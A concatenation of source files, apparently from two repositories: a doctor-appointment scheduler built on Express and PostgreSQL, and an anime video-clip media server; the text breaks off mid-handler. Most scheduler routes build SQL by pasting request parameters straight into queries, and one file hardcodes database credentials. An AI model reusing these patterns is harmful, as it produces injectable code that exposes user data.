res.send("request removed");
});
//clearR clears requests for a user
app.post('/clearR', function(req,res){
var id = req.query.user;
doc.query("DELETE FROM request WHERE userid="+id+" AND update ='cancelled'");
doc.query("UPDATE request SET update = 'd' WHERE (userid = '"+id+"') AND (update IS NOT NULL)");
res.send("hi");
});
app.delete('/remove', function(req,res){
//delete specified record based of pkid
console.log(req.query.pkid);
client.query("DELETE FROM esloc WHERE pkid="+req.query.pkid+"");
res.send(req.query.pkid);
});
//this will take care of removing a
//event from the calendar when a user clicks
//on it to remove
app.get('/removeAppointments', function(req,res){
//delete specified record based of pkid
pkid = req.query.id;
admin = req.query.admin;
var getName = doc.query("SELECT pfirst,requestid FROM operations WHERE pkid = '"+pkid+"'")
getName.on("row", function (row, result) {
result.addRow(row);
});
getName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
if(json[0].pfirst == null){
doc.query("DELETE FROM operations WHERE pkid="+req.query.id+"");
}
else{
if(admin == 'admin'){
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
console.log(pkid);
pkid = parseInt(pkid)+1;
console.log(pkid);
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
doc.query("UPDATE request SET update = 'cancelled' WHERE pkid = '"+json[0].requestid+"'");
}
else{
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
pkid = parseInt(pkid)-1;
doc.query("DELETE FROM operations WHERE pkid="+pkid+"");
doc.query("UPDATE request SET update = 'cancelled' WHERE pkid = '"+json[0].requestid+"'");
}
}
res.send(json);
})
});
//this is called when Doctor accepts a request
// that conflicts with a prior event
app.post('/updateRequest', function(req,res){
var update = req.query.update;
var pkid = req.query.pkid;
doc.query("UPDATE request SET update = '"+update+"' WHERE pkid = '"+pkid+"'")
res.send("hi");
})
//
app.get('/getOperation', function(req,res){
var pkid = req.query.pkid;
var mystr = "SELECT * FROM operations WHERE (pkid='"+pkid+"') "
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
res.send(json);
})
})
app.post('/whichDoc', function(req,res){
var user = req.query.user;
var docId = req.query.docId;
users.query("UPDATE users SET docid = '"+docId+"' WHERE id = '"+user+"'")
var getName = users.query("SELECT first, last,admin,id FROM users WHERE id = '"+docId+"'")
getName.on("row", function (row, result) {
result.addRow(row);
});
getName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
res.send(json);
})
});
//this fetches the events to be displayed on the calendar
app.get('/getAppointments', function(req,res){
var id = req.query.id;
var JSON1;
var docId = users.query("SELECT docId,admin FROM users WHERE id = '"+id+"'")
var doctorSelected;
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
doctorSelected = json[0].docid;
admin = json[0].admin;
var mystr = "SELECT * FROM operations WHERE (userid='"+doctorSelected+"') "
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
var events = [];
console.log(json);
var color = "";
var theTitle;
for(var i=0; i<json.length; i++){
if(admin == "admin"){
if(json[i].plast != null && json[i].plast != "null"){
theTitle = json[i].activity;
}
else{
theTitle = json[i].activity;
}
}
else{
if(json[i].dfirst !=null && doctorSelected == id){
theTitle = json[i].activity+" with Dr. "+json[i].dlast;
}
else if(doctorSelected != id && doctorSelected!=null && json[i].plast !=null && json[i].plast != "null"){
theTitle = json[i].activity;
}
else{
theTitle = json[i].activity;
}
}
var myevent = {
title: theTitle,
start: json[i].yearmonthday+"T"+json[i].start,
end: json[i].yearmonthday+"T"+json[i].end1,
id: json[i].pkid,
color: "#"+json[i].color,
}
events.push(myevent);
}
res.send(events);
})
})
})
app.post('/requestAccepted', function(req,res){
var stime = req.query.stime;
var docid = req.query.docid;
var etime = req.query.etime;
var id = req.query.userid;
var activity = req.query.activity;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var first = req.query.first;
var last = req.query.last;
var dfirst = req.query.dfirst;
var dlast = req.query.dlast;
var auto_insert = req.query.auto_insert;
var reqId = req.query.reqId;
var sAMPM;
var eAMPM
if(stime.includes("AM")){
sAMPM = "AM";
}
else{
sAMPM = "PM";
}
if(stime.includes("AM")){
eAMPM = "AM";
}
else{
eAMPM = "PM";
}
var stime = getTime(stime, sAMPM);
var etime = getTime(etime, eAMPM);
mystr = "SELECT * FROM operations WHERE (userid='"+docid+"') AND ( ('"+stime+"'<= start AND '"+etime+"' >= end1) OR (start<='"+stime+"' AND end1>= '"+etime+"') OR (start <= '"+stime+"' AND end1 >= '"+stime+"') OR (start<= '"+etime+"' AND end1>= '"+etime+"')) AND (yearmonthday = '"+yearmonthday+"')" //this was used to select all elements belonging to a specific user
if(auto_insert == "NO"){
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
if(json[0] == null){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
} else {
var i =0;
var x =0;
for(key in json){
if (json[key].start == etime || json[key].end1 == stime){
x++;
}
i++;
}
console.log("x = "+x);
console.log("i = "+i);
if(x==i){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
}
else{
res.send(JSON1);
}
}
})
}
else{
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+docid+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,pfirst,plast,dfirst,dlast,requestid) VALUES ('"+stime+"','"+etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+first+"','"+last+"','"+dfirst+"','"+dlast+"','"+reqId+"')");
res.send("inserted");
}
})
app.post('/request', function(req,res){
var color = req.query.color1;
var Stime = req.query.Stime;
var docid = req.query.docid;
var Shour;
var Smin;
var Ehour;
var Emin;
var Etime = req.query.Etime;
var sAMPM = req.query.sAMPM;
var eAMPM = req.query.eAMPM;
var id = req.query.id;
var activity = req.query.activity;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var why = "2017-25-30?";
var Stime = getTime(Stime, sAMPM);
var Etime = getTime(Etime, eAMPM);
var userinfo = users.query("SELECT first, last FROM users WHERE id = '"+id+"'")
userinfo.on("row", function (row, result) {
result.addRow(row);
});
userinfo.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
first = json[0].first;
last = json[0].last;
var docName = users.query("SELECT first, last FROM users WHERE id = '"+docid+"'")
docName.on("row", function (row, result) {
result.addRow(row);
});
docName.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
doc.query("INSERT INTO request (stime,etime,userid,activity,yearmonthday,docid,first,last,dfirst,dlast) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+docid+"','"+first+"','"+last+"','"+json[0].first+"','"+json[0].last+"')");
})
})
res.send("inserted");
});
app.get('/getRequests', function(req,res){
var docId = req.query.docid;
var show = req.query.show;
console.log(show);
var docId = doc.query("SELECT * FROM request WHERE (docid = '"+docId+"')");
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
console.log("hi");
console.log(json);
var arr = [];
if(show=="show"){
console.log("MADE IT")
for(var i = 0; i < json.length; i++) {
if(json[i].update == null){
arr.push(json[i])
}
}
res.send(arr);
}
else{
res.send(json);
}
})
});
app.get('/showUpdates', function(req,res){
var user = req.query.user;
var docId = doc.query("SELECT * FROM request WHERE (userid = '"+user+"')");
docId.on("row", function (row, result) {
result.addRow(row);
});
docId.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
var arr = [];
for(var i = 0; i < json.length; i++) {
if(json[i].update != null && json[i].update != 'd'){
arr.push(json[i])
}
}
res.send(arr);
})
})
function getTime(time,AMPM){
var time = time.split(":");
hour = parseInt(time[0])
if(hour<10){
hour=0+hour.toString()
}
min = parseInt(time[1])
if(min<10){
min = 0+min.toString()
}
hour= parseInt(hour);
if(AMPM == "PM"){
if(hour!=12){
hour = hour + 12;
}
}
if(AMPM == "AM"){
if(hour<10){
hour = "0"+hour;
}
}
hour.toString();
time = hour+":"+min+":"+"00";
return time;
}
app.post('/operation', function(req,res){
var color = req.query.color1;
var Stime = req.query.Stime;
var Shour;
var Smin;
var Ehour;
var Emin;
var Etime = req.query.Etime;
var sAMPM = req.query.sAMPM;
var eAMPM = req.query.eAMPM;
var id = req.query.id;
var activity = req.query.activity;
var requestAccepted = req.query.requestAccepted;
var yearmonthday = req.query.yearmonthday;
var auto_insert = req.query.auto_insert;
var why = "2017-25-30?";
var MStime = Stime;
var MEtime = Etime;
var Stime = getTime(Stime, sAMPM);
var Etime = getTime(Etime, eAMPM);
var JSON1;
var mystr;
mystr = "SELECT * FROM operations WHERE (userid='"+id+"') AND ( ('"+Stime+"'<= start AND '"+Etime+"' >= end1) OR (start<='"+Stime+"' AND end1>= '"+Etime+"') OR (start <= '"+Stime+"' AND end1 >= '"+Stime+"') OR (start<= '"+Etime+"' AND end1>= '"+Etime+"')) AND (yearmonthday = '"+yearmonthday+"')" //this was used to select all elements belonging to a specific user
if(auto_insert == "NO"){
var query = doc.query(mystr )
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
JSON1 = json;
if(json[0] == null){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
} else {
var i =0;
var x =0;
while(i<json.length){
if (json[i].start == Etime || json[i].end1 == Stime){
x++;
}
i++;
}
if(x==i){
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
}
else{
res.send(JSON1);
}
}
})
}
else{
doc.query("INSERT INTO operations (start,end1,userid,activity,yearmonthday,color) VALUES ('"+Stime+"','"+Etime+"','"+id+"','"+activity+"','"+yearmonthday+"','"+color+"')");
res.send("inserted");
}
});
app.listen(3000, function () {
console.log('CORS-enabled web server listening on port 3000')
})
<|start_filename|>clean_server/createUserTable/app/sequelize.js<|end_filename|>
/*var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://user:password@localhost:5432/database')
module.exports = sequelize*/
var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://daniel:admin@localhost:5432/seq')
//here you will need to configure sequelize to work for your own setup
module.exports = sequelize
<|start_filename|>scurrent_clean/app/dist/theme.css<|end_filename|>
#signupbtn{
background-color: #1D2731;
border-color: #1D2731;
color: white;
}
#gotologin{
font-weight: bold;
background-color: #1D2731;
border-color: #1D2731;
color: white;
margin-top: 5px;
margin-left: 5px;
opacity: .8;
}
#gotologin:hover{
opacity: 1;
}
.conflictD{
opacity: 1;
}
dialog{
opacity:.7;
background-color:#e7fff9;
}
#mrowDocRequest{
margin-top: 20px;
}
#mrowDocRequest:hover{
background-color: #6790B1;
color:black;
}
#favDialog1{
opacity:.7;
background-color:#e7fff9;
/*border:10px solid orange;
opacity: .7;
color: red;
padding: 1.5em;
margin: 1em auto;
border: 0;
border-top: 5px solid #69c773;*/
}
#favDialog1 h3{
margin-left:70px;
}
#mrowDoc:hover{
background-color: #6790B1;
color:white;
}
#divcontainer2 .form-control:focus{
/* border-color: #1D2731;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(29, 39, 49, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(29, 39, 49, 1);*/
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer .form-control:focus{
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer select:focus{
border-color: #337ab7;
outline: 0;
-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
box-shadow: inset 0 1px 1px rgba(0,0,0,.075), 0 0 8px rgba(51, 122, 183, 1);
}
#calendarContainer .form-control{
margin-bottom: 5px;
}
#calSubBtn {
margin-top: 25px;
}
#caReqBtn{
margin-top: 25px;
}
#updatesDialog button{
margin-top: 10px;
}
#updatesDialog h3{
text-align: center;
}
.docbtns{
background-color: #E8E8E8;
}
.docbtns:hover{
background-color: #B6B6B6;
color:white;
}
.reqViewBtn{
margin-top: 25px;
margin-left: 200px;
}
.textC{
font-weight: bold;
color: #337ab7;
margin-bottom: 20px;
margin-top: 5px;
margin-left: 40px;
}
#colorSelect{
margin-top: 5px;
}
#cancellationsBtn{
margin-top: 25px;
}
#divcontainer2{
margin-left: auto;
width: 30%;
margin-right: auto;
height: 100%;
margin-top: 5%
}
#container2{
width: 100%;
}
/* Popup container - can be anything you want */
.popup {
position: relative;
display: inline-block;
cursor: pointer;
-webkit-user-select: none;
-moz-user-select: none;
-ms-user-select: none;
user-select: none;
}
/* The actual popup */
.popup .popuptext {
visibility: hidden;
width: 160px;
background-color: #555;
color: #fff;
text-align: center;
border-radius: 6px;
padding: 8px 0;
position: absolute;
z-index: 1;
bottom: 125%;
left: 50%;
margin-left: -80px;
}
/* Popup arrow */
.popup .popuptext::after {
content: "";
position: absolute;
top: 100%;
left: 50%;
margin-left: -5px;
border-width: 5px;
border-style: solid;
border-color: #555 transparent transparent transparent;
}
/* Toggle this class - hide and show the popup */
.popup .show {
visibility: visible;
-webkit-animation: fadeIn 1s;
animation: fadeIn 1s;
}
/* Add animation (fade in the popup) */
@-webkit-keyframes fadeIn {
from {opacity: 0;}
to {opacity: 1;}
}
@keyframes fadeIn {
from {opacity: 0;}
to {opacity:1 ;}
}
#divcontainer{
margin-left: auto;
width: 20%;
margin-right: auto;
height: 100%;
margin-top: 10%
}
#container{
width: 100%;
}
.btn-primary {
color: #C09F80;
background-color: #76323F;
border-color: #76323F;
margin-top: 20px;
opacity: .8;
}
.btn-primary:hover{
color: #C09F80;
background-color: #76323F;
border-color: #76323F;
margin-top: 20px;
opacity: 1;
}
#loginbtn:hover {
opacity: 1;
}
#signbtn{
opacity: .8;
font-weight: bold;
margin-top: 5px;
margin-left: 5px;
background-color: #1D2731;
border-color: #1D2731;
color: white;
}
#signbtn:hover{
opacity: 1;
}
#loginbtn{
background-color: #1D2731;
border-color: #1D2731;
color: white ;
opacity: .8;
}
<|start_filename|>clean_server/resources/app/controllers/signupController.js<|end_filename|>
var bcrypt = require('bcrypt'),
Model = require('../models/models.js')
module.exports.show = function(req, res) {
res.render('signup')
}
module.exports.signup = function(req, res) {
express = require('express');
var cors = require('cors');
var router = express.Router()
router.use(cors());
var username = req.query.username
var password = <PASSWORD>
var password2 = req.query.password2
//create the hashed password
var salt = bcrypt.genSaltSync(10)
var hashedPassword = bcrypt.hashSync(password, salt)
var newUser = {
username: username,
salt: salt,
password: <PASSWORD>
}
Model.User.create(newUser).then(function() { //.create will create a new record using the given input using sequelize
res.send('success');
console.log('did it')
}).catch(function(error) {
req.flash('error', "Please, choose a different username.")
res.redirect('/signup')
})
}
<|start_filename|>scurrent_clean/app/src/renderer/main.js<|end_filename|>
import Vue from 'vue'
import Electron from 'vue-electron'
import Resource from 'vue-resource'
import Router from 'vue-router'
import Vuex from 'vuex'
import jQuery from 'jquery'
global.jQuery = jQuery
import App from './App'
import routes from './routes'
import { store } from './store.js';
Vue.use(require('vue-full-calendar'));
Vue.use(Electron)
Vue.use(Resource)
Vue.use(Router)
Vue.use(Vuex);
Vue.config.debug = true
const router = new Router({
scrollBehavior: () => ({ y: 0 }),
routes
})
//creates new Vue using my App.vue file
new Vue({
store,
router,
...App,
beforeMount: function(){
//.fullCalendar
$('#calendar').fullCalendar({
events: [
{
title : 'event1',
start : '2017-06-01'
},
{
title : 'event2',
start : '2017-06-05',
end : '2010-01-07'
},
{
title : 'event3',
start : '2017-06-09T12:30:00',
allDay : false // will make the time show
}
],
navLinks: true,
header:
{
left: 'prev,next today',
center: 'title',
right: 'month,agendaWeek,agendaDay'
},
});
}
}).$mount('#app')
<|start_filename|>clean_server/createUserTable/app/model/operationModels.js<|end_filename|>
var Sequelize = require('sequelize')
var attributes = {
userid: {
type: Sequelize.INTEGER,
},
start: {
type: Sequelize.TIME,
},
end1: {
type: Sequelize.TIME,
},
activity: {
type: Sequelize.STRING,
},
yearmonthday: {
type: Sequelize.STRING,
},
color: {
type: Sequelize.STRING,
},
pfirst: {
type: Sequelize.STRING,
},
plast: {
type: Sequelize.STRING,
},
dfirst: {
type: Sequelize.STRING,
},
dlast: {
type: Sequelize.STRING,
},
requestid: {
type: Sequelize.INTEGER,
},
}
var options = {
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>clean_server/resources/app/models/models.js<|end_filename|>
var UserMeta = require('./User.js'),
connection = require('../sequelize.js')
//here we define our connection to user table using sequelize
//and make use of attributes defined in User.js
var User = connection.define('users', UserMeta.attributes, UserMeta.options)
// you can define relationships here
module.exports.User = User
<|start_filename|>clean_server/resources/app/routers/appRouter.js<|end_filename|>
var passport = require('passport'),
signupController = require('../controllers/signupController.js'),
bcrypt = require('bcrypt'),
Model = require('../models/models.js'),
pg = require("pg"),//new
LocalStrategy = require('passport-local').Strategy;
var doctor = {//new
user: 'postgres', //env var: PGUSER
database: 'seq', //env var: PGDATABASE
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}//new
var doc = new pg.Client(doctor);//new
doc.connect();//new
module.exports = function(express) {
var router = express.Router()
var cors = require('cors')
router.use(cors());
router.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
router.post('/what', function(req,res){
res.send(req.query.username);
});
var isAuthenticated = function (req, res, next) {
if (req.isAuthenticated())
return next()
req.flash('error', 'You have to be logged in to access the page.')
res.redirect('/')
}
router.get('/getDocs', function(req,res){
console.log(req.query.admin)
var mystr = "SELECT username,first,last,city,specialty,id FROM users WHERE admin = 'admin'";
var query = doc.query(mystr);
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
console.log(json1)
res.send(json1);
})
})
router.get('/signup', signupController.show)
router.post('/signup', function(req, res){
console.log(req.query);
var city = req.query.city
var first = req.query.first
var last = req.query.last
var specialty = req.query.specialty
var username = req.query.username
var password = req.query.password
var password2 = req.query.password2
var admin = req.query.admin
// console.log(username);
if (!username || !password || !password2) { //checks to make sure all fields filled in
//make sure all fields filled in
res.send('error1');
}
else if (password !== password2) {
//passwords do not match
res.send('error2');
}
else {
var salt = bcrypt.genSaltSync(10)
var hashedPassword = bcrypt.hashSync(password, salt)
var newUser = {
username: username,
salt: salt,
password: <PASSWORD>,
admin: admin,
first: first,
last: last,
city: city,
specialty: specialty,
}
Model.User.create(newUser).then(function() { //.create will create a new record using the given input using sequelize
var mystr = "SELECT MAX(id) FROM users";
var query = doc.query(mystr);
query.on("row", function (row, result) {
result.addRow(row);
});
query.on("end", function (result) {
var json1 = JSON.stringify(result.rows, null, " ");
var json = JSON.parse(json1);
for(var i = 0; i < json.length; i++) {
var obj = json[i];
}
console.log("The json is: "+ json1)
res.send(json1);
})
}).catch(function(error) {
// req.flash('error', "Please, choose a different username.")
res.send('error3');
})
}
})
router.post('/login', function(req, res, next) {
//local specifies that we use the local strategy
//show local strategy
passport.authenticate('local', function(err, user, info) {
req.logIn(user, function(err) {
if (err) { res.send('error')}
else{//return res.redirect('/users/' + user.username);
res.send(user);} //perhaps make an sql query here and return the pkid of user
});
})(req, res, next);
});
router.get('/', function(req, res) {
res.render('home')
})
router.get('/dashboard', isAuthenticated, function(req, res) {
res.render('dashboard')
})
router.get('/logout', function(req, res) {
req.logout()
res.redirect('/')
})
router.get('/hi',function(req,res){
console.log('HI');
})
return router
}
<|start_filename|>clean_server/createUserTable/app/model/User.js<|end_filename|>
var Sequelize = require('sequelize')
var attributes = {
username: {
type: Sequelize.STRING,
allowNull: false,
unique: true,
validate: {
is: /^[a-z0-9\_\-]+$/i,
}
},
email: {
type: Sequelize.STRING,
validate: {
isEmail: true
}
},
first: {
type: Sequelize.STRING,
},
last: {
type: Sequelize.STRING,
},
password: {
type: Sequelize.STRING,
},
salt: {
type: Sequelize.STRING
},
admin: {
type: Sequelize.STRING
},
specialty: {
type: Sequelize.STRING
},
city: {
type: Sequelize.STRING
},
docid: {
type: Sequelize.INTEGER
},
}
var options = {
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>scurrent_clean/app/src/renderer/store.js<|end_filename|>
import Vuex from 'vuex'
export const store = new Vuex.Store({
state: {
safelyStoredNumber: 3,
user: "",
admin: "",
docId: "",
},
getters: {
safelyStoredNumber: state => state.safelyStoredNumber,
user: state => state.user,
admin: state => state.admin,
docId: state => state.docId,
},
mutations: {
setStoredNumber(state, newNumber) {
// newNumber is the payload passed in.
state.safelyStoredNumber = newNumber;
},
user(state, newUser){
state.user = newUser;
},
docId(state, newdocId){
state.docId = newdocId;
},
admin(state, newAdmin){
state.admin = newAdmin;
}
}
});
| danieltoorani/adminScheduler |
<|start_filename|>server.js<|end_filename|>
import "dotenv/config.js";
import express from "express";
import rateLimit from "express-rate-limit";
import list from "./src/list.js";
import video from "./src/video.js";
import image from "./src/image.js";
import file from "./src/file.js";
import checkSecret from "./src/check-secret.js";
const {
SERVER_ADDR = "0.0.0.0",
SERVER_PORT = 3000,
VIDEO_PATH = "/mnt/",
TRACE_MEDIA_SALT,
TRACE_API_SECRET,
} = process.env;
const app = express();
app.disable("x-powered-by");
app.set("trust proxy", 1);
app.use((req, res, next) => {
res.set("Access-Control-Allow-Origin", "*");
res.set("Access-Control-Allow-Methods", "GET, OPTIONS");
res.set("Referrer-Policy", "no-referrer");
res.set("X-Content-Type-Options", "nosniff");
res.set(
"Content-Security-Policy",
[
"default-src 'none'",
"media-src 'self'",
"base-uri 'none'",
"frame-ancestors 'none'",
"form-action 'none'",
"block-all-mixed-content",
].join("; ")
);
next();
});
app.use(
rateLimit({
max: 30, // 30 requests per IP address (per node.js process)
windowMs: 60 * 1000, // per 1 minute
})
);
app.get("/", (req, res) => res.send("ok"));
app.get("/video/:anilistID/:filename", video);
app.get("/image/:anilistID/:filename", image);
app.use("/file/:anilistID/:filename", checkSecret, file);
app.use("/list", checkSecret, list);
if (TRACE_API_SECRET) {
console.log("Video upload/download secured by TRACE_API_SECRET");
}
if (TRACE_MEDIA_SALT) {
console.log("Video clip and image secured by TRACE_MEDIA_SALT");
}
console.log(`VIDEO_PATH: ${VIDEO_PATH}`);
app.listen(SERVER_PORT, SERVER_ADDR, () =>
console.log(`Media server listening on ${SERVER_ADDR}:${SERVER_PORT}`)
);
<|start_filename|>src/list.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
const { VIDEO_PATH = "/mnt/" } = process.env;
export default async (req, res) => {
const videoDirPath = path.join(VIDEO_PATH, req.path);
if (!videoDirPath.startsWith(VIDEO_PATH)) {
return res.status(403).send("Forbidden");
}
if (!fs.existsSync(videoDirPath)) {
return res.status(404).send("Not found");
}
res.json(fs.readdirSync(videoDirPath));
};
<|start_filename|>src/lib/get-video-duration.js<|end_filename|>
import child_process from "child_process";
export default (filePath) => {
const stdLog = child_process.spawnSync(
"ffprobe",
["-i", filePath, "-show_entries", "format=duration", "-v", "quiet"],
{ encoding: "utf-8" }
).stdout;
const result = /duration=((\d|\.)+)/.exec(stdLog);
if (result === null) {
return null;
}
return parseFloat(result[1]);
};
<|start_filename|>src/video.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
import crypto from "crypto";
import child_process from "child_process";
import detectScene from "./lib/detect-scene.js";
const { VIDEO_PATH = "/mnt/", TRACE_MEDIA_SALT } = process.env;
const generateVideoPreview = (filePath, start, end, size = "m", mute = false) => {
const ffmpeg = child_process.spawnSync(
"ffmpeg",
[
"-hide_banner",
"-loglevel",
"error",
"-nostats",
"-y",
"-ss",
start - 10,
"-i",
filePath,
"-ss",
"10",
"-t",
end - start,
mute ? "-an" : "-y",
"-map",
"0:v:0",
"-map",
"0:a:0",
"-vf",
`scale=${{ l: 640, m: 320, s: 160 }[size]}:-2`,
"-c:v",
"libx264",
"-crf",
"23",
"-profile:v",
"high",
"-preset",
"faster",
"-r",
"24000/1001",
"-pix_fmt",
"yuv420p",
"-c:a",
"aac",
"-b:a",
"128k",
"-max_muxing_queue_size",
"1024",
"-movflags",
"empty_moov",
"-map_metadata",
"-1",
"-map_chapters",
"-1",
"-f",
"mp4",
"-",
],
{ maxBuffer: 1024 * 1024 * 100 }
);
if (ffmpeg.stderr.length) {
console.log(ffmpeg.stderr.toString());
}
return ffmpeg.stdout;
};
export default async (req, res) => {
if (
TRACE_MEDIA_SALT &&
req.query.token !==
crypto
.createHash("sha1")
.update([req.params.anilistID, req.params.filename, req.query.t, TRACE_MEDIA_SALT].join(""))
.digest("base64")
.replace(/[^0-9A-Za-z]/g, "")
) {
return res.status(400).send("Bad Request");
}
const t = parseFloat(req.query.t);
if (isNaN(t) || t < 0) {
return res.status(400).send("Bad Request");
}
const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
return res.status(403).send("Forbidden");
}
if (!fs.existsSync(videoFilePath)) {
return res.status(404).send("Not found");
}
const size = req.query.size || "m";
if (!["l", "m", "s"].includes(size)) {
return res.status(400).send("Bad Request");
}
const minDuration = Number(req.query.minDuration) || 0.25;
try {
const scene = await detectScene(videoFilePath, t, minDuration > 2 ? 2 : minDuration);
if (scene === null) {
return res.status(500).send("Internal Server Error");
}
const video = generateVideoPreview(
videoFilePath,
scene.start,
scene.end,
size,
"mute" in req.query
);
res.set("Content-Type", "video/mp4");
res.set("x-video-start", scene.start);
res.set("x-video-end", scene.end);
res.set("x-video-duration", scene.duration);
res.set("Access-Control-Expose-Headers", "x-video-start, x-video-end, x-video-duration");
res.send(video);
} catch (e) {
console.log(e);
res.status(500).send("Internal Server Error");
}
};
<|start_filename|>src/file.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
const { VIDEO_PATH = "/mnt/" } = process.env;
export default async (req, res) => {
const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
res.status(403).send("Forbidden");
return;
}
if (req.method === "GET") {
if (!fs.existsSync(videoFilePath)) {
return res.status(404).send("Not found");
}
const readStream = fs.createReadStream(videoFilePath);
readStream.on("open", () => {
res.set("Content-Type", "video/mp4");
readStream.pipe(res);
});
readStream.on("error", (err) => {
console.log(JSON.stringify(err, null, 2));
res.sendStatus(500);
});
} else if (req.method === "PUT") {
console.log(`Uploading ${videoFilePath}`);
